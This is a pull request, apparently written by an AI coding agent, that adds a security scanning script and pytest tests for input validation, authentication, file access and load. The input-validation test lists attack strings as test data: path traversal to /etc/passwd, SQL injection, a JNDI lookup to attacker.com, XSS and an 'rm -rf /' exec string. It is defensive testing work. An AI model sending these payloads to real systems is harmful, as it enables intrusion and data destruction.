### PR TITLE
Add security test suite and scanning script

### DIFF
--- a/scripts/security_scan.py
+++ b/scripts/security_scan.py
@@ -1,0 +1,39 @@
+from __future__ import annotations
+
+import asyncio
+import os
+from pathlib import Path
+from typing import List
+
+from security.vulnerability_scanner import VulnerabilityScanner
+
+
+async def run_bandit(paths: List[str]) -> int:
+    proc = await asyncio.create_subprocess_exec(
+        "bandit", "-r", *paths, "-f", "json", "-o", "bandit_report.json"
+    )
+    await proc.communicate()
+    return proc.returncode or 0
+
+
+async def run_zap(target: str) -> int:
+    proc = await asyncio.create_subprocess_exec(
+        "zap-cli", "quick-scan", "-r", "-o", "zap_report.html", target
+    )
+    await proc.communicate()
+    return proc.returncode or 0
+
+
+async def main() -> None:
+    scanner = VulnerabilityScanner()
+    vulns = await scanner.scan_requirements(Path("requirements.txt"))
+    if vulns:
+        print("Vulnerabilities found:", ", ".join(vulns))
+    await run_bandit(["ai_video_pipeline", "services", "utils", "security"])
+    target = os.getenv("ZAP_TARGET")
+    if target:
+        await run_zap(target)
+
+
+if __name__ == "__main__":
+    asyncio.run(main())

--- a/tests/load/test_concurrent_security.py
+++ b/tests/load/test_concurrent_security.py
@@ -1,0 +1,22 @@
+import sys
+import asyncio
+from pathlib import Path
+import pytest
+
+sys.path.append(str(Path(__file__).resolve().parents[2]))
+from utils.security_test_utils import authenticate_request, process_memory_usage
+
+
+@pytest.mark.load
+class TestSecurityUnderLoad:
+    @pytest.mark.asyncio
+    async def test_concurrent_authentication_attempts(self) -> None:
+        async def attempt_auth() -> None:
+            with pytest.raises(Exception):
+                await authenticate_request("invalid-key")
+
+        initial = process_memory_usage()
+        tasks = [attempt_auth() for _ in range(100)]
+        results = await asyncio.gather(*tasks, return_exceptions=True)
+        assert all(r is None for r in results)
+        assert process_memory_usage() < initial * 1.2

--- a/tests/load/test_stress_authentication.py
+++ b/tests/load/test_stress_authentication.py
@@ -1,0 +1,19 @@
+import sys
+import asyncio
+from pathlib import Path
+import pytest
+
+sys.path.append(str(Path(__file__).resolve().parents[2]))
+from utils.security_test_utils import authenticate_request
+
+
+@pytest.mark.load
+@pytest.mark.asyncio
+async def test_stress_authentication() -> None:
+    async def attempt() -> None:
+        with pytest.raises(Exception):
+            await authenticate_request("bad-key")
+    tasks = [attempt() for _ in range(200)]
+    results = await asyncio.gather(*tasks, return_exceptions=True)
+    assert len(results) == 200
+    assert all(r is None for r in results)

--- a/tests/security/test_api_security.py
+++ b/tests/security/test_api_security.py
@@ -1,0 +1,21 @@
+import sys
+from pathlib import Path
+from fastapi.testclient import TestClient
+import pytest
+
+sys.path.append(str(Path(__file__).resolve().parents[2]))
+from ai_video_pipeline import api_app
+
+
+@pytest.mark.security
+class TestAPISecurity:
+    def test_security_headers(self, monkeypatch: pytest.MonkeyPatch) -> None:
+        async def fake_authenticate_api_key(api_key: str):
+            from security.auth_manager import User
+            return User(id="u", roles=["admin"])
+
+        monkeypatch.setattr(api_app.auth, "authenticate_api_key", fake_authenticate_api_key)
+        client = TestClient(api_app.app)
+        resp = client.get("/status/none", headers={"X-API-KEY": "k"})
+        assert resp.status_code in {200, 404}
+        assert "X-Frame-Options" in resp.headers

--- a/tests/security/test_authentication_security.py
+++ b/tests/security/test_authentication_security.py
@@ -1,0 +1,28 @@
+import sys
+import time
+from pathlib import Path
+import pytest
+
+sys.path.append(str(Path(__file__).resolve().parents[2]))
+from utils.security_test_utils import validate_api_key
+from exceptions import ConfigurationError
+
+
+@pytest.mark.security
+class TestAuthenticationSecurity:
+    @pytest.mark.asyncio
+    async def test_api_key_timing_attacks(self) -> None:
+        correct_key = "sk-correct-key-12345"
+        attack_keys = [
+            "sk-wrong-key-123456",
+            "sk-corr",
+            "sk-correct-key-12346",
+            "",
+            "invalid-format",
+        ]
+        for attack_key in attack_keys:
+            start = time.perf_counter()
+            with pytest.raises(ConfigurationError):
+                validate_api_key(attack_key)
+            duration = time.perf_counter() - start
+            assert duration <= 0.01

--- a/tests/security/test_file_operation_security.py
+++ b/tests/security/test_file_operation_security.py
@@ -1,0 +1,22 @@
+import sys
+from pathlib import Path
+import pytest
+
+sys.path.append(str(Path(__file__).resolve().parents[2]))
+from utils.file_operations import read_file, save_file
+from exceptions import FileOperationError
+
+
+@pytest.mark.security
+class TestFileOperationSecurity:
+    @pytest.mark.asyncio
+    async def test_unsafe_read(self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None:
+        monkeypatch.setattr('utils.file_operations.BASE_DIR', tmp_path)
+        with pytest.raises(FileOperationError):
+            await read_file('/etc/passwd')
+
+    @pytest.mark.asyncio
+    async def test_unsafe_write(self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None:
+        monkeypatch.setattr('utils.file_operations.BASE_DIR', tmp_path)
+        with pytest.raises(FileOperationError):
+            await save_file('../secret.txt', b'x')

--- a/tests/security/test_input_validation_security.py
+++ b/tests/security/test_input_validation_security.py
@@ -1,0 +1,46 @@
+import sys
+from pathlib import Path
+import pytest
+
+sys.path.append(str(Path(__file__).resolve().parents[2]))
+from utils.validation import sanitize_prompt, validate_file_path
+from exceptions import FileOperationError
+
+
+@pytest.mark.security
+class TestInputValidationSecurity:
+    @pytest.mark.asyncio
+    async def test_path_traversal_attacks(self, tmp_path: Path) -> None:
+        attack_vectors = [
+            "../../../etc/passwd",
+            "..\\..\\windows\\system32\\config\\sam",
+            "....//....//etc/passwd",
+            "..%2F..%2F..%2Fetc%2Fpasswd",
+            "..%252F..%252F..%252Fetc%252Fpasswd",
+            "..%c0%af..%c0%af..%c0%afetc%c0%afpasswd",
+            "/var/www/../../etc/passwd",
+            "..../..../etc/passwd",
+            "..///////..////..//////etc/passwd",
+            "/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
+        ]
+        allowed = tmp_path / "allowed"
+        allowed.mkdir()
+        for attack in attack_vectors:
+            with pytest.raises(FileOperationError):
+                validate_file_path(Path(attack), [allowed])
+
+    @pytest.mark.asyncio
+    async def test_prompt_injection_attacks(self) -> None:
+        injection_attempts = [
+            "'; DROP TABLE users; --",
+            "1' OR '1'='1",
+            "${jndi:ldap://attacker.com/exploit}",
+            "{{constructor.constructor('return process')().exit()}}",
+            "<script>alert('xss')</script>",
+            "UNION SELECT password FROM users--",
+            '"; exec('"'"'rm -rf /'"'"');//',
+            "\x00\x00\x00\x00",
+        ]
+        for injection in injection_attempts:
+            sanitized = sanitize_prompt(injection)
+            assert "<" not in sanitized and ">" not in sanitized

--- a/tests/security/test_timing_attacks.py
+++ b/tests/security/test_timing_attacks.py
@@ -1,0 +1,20 @@
+import sys
+import time
+from pathlib import Path
+import pytest
+
+sys.path.append(str(Path(__file__).resolve().parents[2]))
+from utils.security_test_utils import validate_api_key
+from exceptions import ConfigurationError
+
+
+@pytest.mark.security
+@pytest.mark.asyncio
+async def test_constant_time_validation() -> None:
+    keys = ["sk-wrong", "sa-invalid", "r8_bad"]
+    for key in keys:
+        start = time.perf_counter()
+        with pytest.raises(ConfigurationError):
+            validate_api_key(key)
+        duration = time.perf_counter() - start
+        assert duration <= 0.01

--- a/utils/security_test_utils.py
+++ b/utils/security_test_utils.py
@@ -1,0 +1,51 @@
+from __future__ import annotations
+
+import asyncio
+import os
+import re
+from pathlib import Path
+
+from exceptions import ConfigurationError, FileOperationError, SecurityError
+from security.auth_manager import AuthManager
+from utils.validation import validate_file_path
+
+_API_KEY_PATTERNS = {
+    'openai': r'^sk-[A-Za-z0-9]{20,}$',
+    'sonauto': r'^sa-[A-Za-z0-9]{20,}$',
+    'replicate': r'^r8_[A-Za-z0-9]{20,}$',
+}
+
+
+def validate_api_key(key: str) -> None:
+    """Validate API keys against known patterns."""
+    if not isinstance(key, str) or not key:
+        raise ConfigurationError("API key missing")
+    for pattern in _API_KEY_PATTERNS.values():
+        if re.fullmatch(pattern, key):
+            return
+    raise ConfigurationError("Invalid API key format")
+
+
+async def authenticate_request(api_key: str) -> None:
+    """Authenticate a request using AuthManager."""
+    auth = AuthManager()
+    user = await auth.authenticate_api_key(api_key)
+    if not user:
+        raise SecurityError("Unauthorized")
+
+
+def process_memory_usage() -> float:
+    """Return current process memory usage as percentage of total."""
+    try:
+        rss = 0
+        with open('/proc/self/status') as fh:
+            for line in fh:
+                if line.startswith('VmRSS:'):
+                    rss = int(line.split()[1])
+                    break
+        with open('/proc/meminfo') as fh:
+            meminfo = {line.split(':')[0]: int(line.split()[1]) for line in fh}
+        total = meminfo.get('MemTotal', 1)
+        return rss / total * 100
+    except Exception:
+        return 0.0


### PR DESCRIPTION
## Summary
- implement security testing utilities
- add automated security scanning script
- create comprehensive security tests covering input validation, auth checks, timing attack detection, file operations and load scenarios

## Testing
- `pytest tests/security/test_input_validation_security.py -q`
- `pytest tests/security/test_authentication_security.py -q`
- `pytest tests/security/test_file_operation_security.py -q`
- `pytest tests/load/test_concurrent_security.py -q`
- `pytest tests/load/test_stress_authentication.py -q`
- `pytest tests/security/test_timing_attacks.py -q`
- *(failed to run some tests due to missing dependencies)*

------
https://chatgpt.com/codex/tasks/task_e_6845b0241ba883228167c992539851f4